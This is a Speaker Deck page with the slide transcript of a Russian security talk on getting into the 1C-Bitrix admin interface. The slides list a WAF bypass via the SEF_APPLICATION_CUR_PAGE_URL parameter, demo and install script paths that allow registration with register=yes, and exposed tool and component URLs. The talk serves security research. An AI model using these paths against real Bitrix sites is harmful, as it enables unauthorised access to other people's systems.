Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Выйди и зайди нормально

Avatar for Bo0oM Bo0oM
September 13, 2023
Programming
100
0

Выйди и зайди нормально

О некоторых особенностях административного интерфейса CMS 1С-Битрикс

Avatar for Bo0oM

Bo0oM

September 13, 2023

More Decks by Bo0oM

See All by Bo0oM
Носок на сок
Avatar for Bo0oM bo0om
0
1.9k
Защита от вредоносной автоматизации сегодня
Avatar for Bo0oM bo0om
0
650
Defending against automatization using nginx
Avatar for Bo0oM bo0om
0
900
Antibot pitch deck
Avatar for Bo0oM bo0om
0
180
31337
Avatar for Bo0oM bo0om
0
230
Your back is white
Avatar for Bo0oM bo0om
0
400
FTP2RCE
Avatar for Bo0oM bo0om
1
7.7k
Interpret it!
Avatar for Bo0oM bo0om
0
1.2k
At Home Among Strangers
Avatar for Bo0oM bo0om
1
4k

Other Decks in Programming

See All in Programming
次世代リンターで探る、tsgo 時代における型認識カスタムルールの現実解
Avatar for Yuta Takahashi ytakahashii
1
1k
GitHub Copilot CLIのいいところ
Avatar for tkym htkym
2
1.1k
JavaDoc 再入門
Avatar for nagise nagise
0
120
AIチームを指揮するOSS「TAKT」活用術 / How to Use “TAKT,” an OSS Tool for Orchestrating AI Teams
Avatar for nrs nrslib
5
690
分析エージェント精度向上における データアナリストの役割
Avatar for oura_shoya oura_shoya
0
120
RailsTokyo 2026#4: AI様があれば、
Hotwireの弱点は消えるか?
Avatar for Naofumi Kagami naofumi
5
990
Zod v4 Codec でスキーマに型変換を埋め込む REST API 設計 #TSKaigi2026
Avatar for Ryutaro Yako ryutaro_yako
0
150
RTSPクライアントを自作してみた話
Avatar for simotin13 simotin13
0
210
Signal Forms: Beyond the Basics @ngBaguette 2026 in Paris
Avatar for Manfred Steyer manfredsteyer
PRO
0
120
AI駆動開発勉強会 広島支部 第一回勉強会 AI駆動開発概要とワークショップ
Avatar for smz hyt hayatoshimiu
0
390
AIとRubyの静的型付け
Avatar for ukin0k0 ukin0k0
0
130
気づいたらRubyで100作品 ー クリエイティブコーディングが生活の一部になるまで / 100 Ruby Sketches Later: How Creative Coding Became Part of My Life
Avatar for chobishiba chobishiba
2
380

Featured

See All Featured
What the history of the web can teach us about the future of AI
Avatar for Ines Montani inesmontani
PRO
1
580
Color Theory Basics | Prateek | Gurzu
Avatar for Gurzu gurzu
0
320
End of SEO as We Know It (SMX Advanced Version)
Avatar for Michael King ipullrank
3
4.2k
Public Speaking Without Barfing On Your Shoes - THAT 2023
Avatar for David Neal reverentgeek
1
400
Site-Speed That Sticks
Avatar for Harry Roberts csswizardry
13
1.2k
How to Think Like a Performance Engineer
Avatar for Harry Roberts csswizardry
28
2.6k
Hiding What from Whom? A Critical Review of the History of Programming languages for Music
Avatar for Tomoya Matsuura tomoyanonymous
2
820
Money Talks: Using Revenue to Get Sh*t Done
Avatar for Nikki Halliwell nikkihalliwell
0
230
Abbi's Birthday
Avatar for Violet Bock coloredviolet
2
7.7k
Java REST API Framework Comparison - PWX 2021
Avatar for Matt Raible mraible
34
9.3k
Speed Design
Avatar for Sergey Chernyshev sergeychernyshev
33
1.7k
Leo the Paperboy
Avatar for Maya Tellez mayatellez
7
1.8k

Transcript

  1. «Выйди и зайди нормально!» Anton Lopanitsyn

  2. КТО Я? • Тыкаю кавычки (атакую). • Запрещаю тыкать кавычки

    (защищаю). • Пытаюсь в стартапы по ИБ (passleak.com, antibot.ru) – но нехватает денюшков • Исследую, развлекаюсь, рассказываю об этом Bo0oM

  3. Как обычно ломают Bitrix? • restore.php Система восстановления файлов в

    Bitrix • vote/uf.php CVE-2022-27228 • html_editor_action.php CVE-???, вроде ту же самую дали ей)))0) • уязвимости в самописных модулях не покрытых waf’ом Ну тут как будто без комментариев

  4. Исправления

  5. Исправления

  6. None

  7. Обходим первые защиты

  8. SEF_APPLICATION_CUR_PAGE_URL /pewpew/?SEF_APPLICATION_CUR_PAGE_URL=/bitrix/admin/

  9. SEF_APPLICATION_CUR_PAGE_URL /pewpew/?SEF_APPLICATION_CUR_PAGE_URL=/bitrix/admin/ /pewpew/?SEF%20APPLICATION%20CUR%20PAGE_URL=/bitrix/admin/ /pewpew/?SEF+APPLICATION%20CUR+PAGE[URL=/bitrix/admin/

  10. None
  11. None
  12. None

  13. /auth/?register=yes

  14. /crm/?register=yes

  15. /auth/oauth2/?register=yes

  16. Demo /bitrix/wizards/bitrix/demo/public_files/ru/auth/index.php?register=yes /bitrix/wizards/bitrix/demo/modules/examples/public/language/ru/examples/c ustom-registration/index.php /bitrix/wizards/bitrix/demo/modules/examples/public/language/ru/examples/ my-components/news_list.php?register=yes /bitrix/wizards/bitrix/demo/modules/subscribe/public/personal/subscribe/subs cr_edit.php?register=YES&sf_EMAIL=

  17. Demo

  18. Demo

  19. Install /bitrix/modules/bitrix.siteinfoportal/install/wizards/bitrix/infoportal/site/ public/ru/personal/profile/index.php?register=yes /bitrix/modules/bitrix.siteinfoportal/install/wizards/bitrix/infoportal/site/ public/ru/board/my/index.php?register=yes /bitrix/modules/forum/install/admin/forum_index.php

  20. Install

  21. None

  22. Даже если взять и попасть в админку не удалось •

    Можно почитать отзывы и обратную связь • Посмотреть списки рассылок • Собрать используемые плагины изнутри • Посмотреть настройки • Побрутить пароли • Собрать дополнительную информацию

  23. Tools /bitrix/tools/catalog_export/yandex_detail.php /bitrix/tools/sale/discount_reindex.php /bitrix/tools/sale/basket_discount_convert.php

  24. Tools

  25. Tools /bitrix/tools/catalog/iblock_catalog_list.php?SHOWALL_1=1

  26. Components /bitrix/components/bitrix/desktop/admin_settings.php /bitrix/components/bitrix/player/player_playlist_edit.php /bitrix/components/bitrix/map.yandex.search/settings/settings.php

  27. Tools /bitrix/tools/bizproc_get_html_editor.php

  28. /bitrix/modules/subscribe/public/subscr_edit.php

  29. smtp

  30. None
  31. None

  32. Никто не знает, что тут